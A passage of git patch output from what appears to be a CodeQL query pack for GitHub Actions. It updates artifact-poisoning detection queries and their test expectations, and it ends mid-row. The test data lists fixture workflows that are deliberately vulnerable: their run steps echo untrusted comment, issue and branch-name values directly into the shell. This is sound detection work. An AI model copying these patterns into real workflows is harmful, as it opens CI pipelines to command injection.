907979b88e7..ab07d0a2f38 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -8,3 +8,5 @@ | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | From ed70ef03078077d943baebd2e4480db9b6830b17 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 15:46:49 +0200 Subject: [PATCH 0167/1267] Make Artifact poisoning query a path problem --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 16 +- .../security/ArtifactPoisoningQuery.qll | 21 + ql/src/Security/CWE-829/ArtifactPoisoning.ql | 24 +- .../CWE-829/PrivilegedArtifactPoisoning.ql | 27 ++ ql/test/library-tests/test.expected | 448 +----------------- .../CWE-829/ArtifactPoisoning.expected | 52 +- .../PrivilegedArtifactPoisoning.expected | 52 ++ .../CWE-829/PrivilegedArtifactPoisoning.qlref | 2 + 8 files changed, 166 insertions(+), 476 deletions(-) create mode 100644 ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.expected create mode 100644 ql/test/query-tests/Security/CWE-829/PrivilegedArtifactPoisoning.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 0fd3f82b2f7..3988f2190ab 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -82,22 +82,18 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da } /** - * A downloaded artifact that gets assigned to an env var declaration. - * - uses: actions/download-artifact@v2 - * - run: echo "::set-env name=id::$(; diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index bd9ec090f7f..6d3910e2ca5 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -1,9 +1,9 @@ /** * @name Artifact poisoning * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. - * @kind problem + * @kind path-problem * @problem.severity warning - * @precision medium + * @precision high * @security-severity 9.3 * @id actions/artifact-poisoning * @tags actions @@ -13,11 +13,19 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery +import ArtifactPoisoningFlow::PathGraph -from LocalJob job, ArtifactDownloadStep downloadStep, PoisonableStep step +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink where - // Workflow is privileged - job.getWorkflow().isPrivileged() and - // Download step is followed by a step that may be poisoned by the download - downloadStep.getAFollowingStep() = step -select downloadStep, "Potential artifact poisoning." + ArtifactPoisoningFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) +select sink.getNode(), source, sink, + "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, + sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql new file mode 100644 index 00000000000..cd6d5eeb108 --- /dev/null +++ b/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql @@ -0,0 +1,27 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind path-problem + * @problem.severity error + * @precision high + * @security-severity 9 + * @id actions/privileged-artifact-poisoning + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery +import ArtifactPoisoningFlow::PathGraph + +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink +where + ArtifactPoisoningFlow::flowPath(source, sink) and + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + w.isPrivileged() + ) +select sink.getNode(), source, sink, + "Potential privileged artifact poisoning in $@, which may be controlled by an external user.", + sink, sink.getNode().toString() diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index aa2ccdcfe9c..a6be2226b8c 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -1,446 +1,2 @@ -files -| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | -| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | -workflows -| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/test.yml:1:1:40:53 | on: push | -reusableWorkflows -compositeActions -jobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -localJobs -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -extJobs -steps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -runSteps -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | -runExprs -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -uses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -stepUses -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -usesArgs -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -runStepChildren -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -parentNodes -| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:10:34:24 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:34:11:34:25 | always() | .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:36:12:36:15 | job1 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:1:1:40:53 | on: push | -| 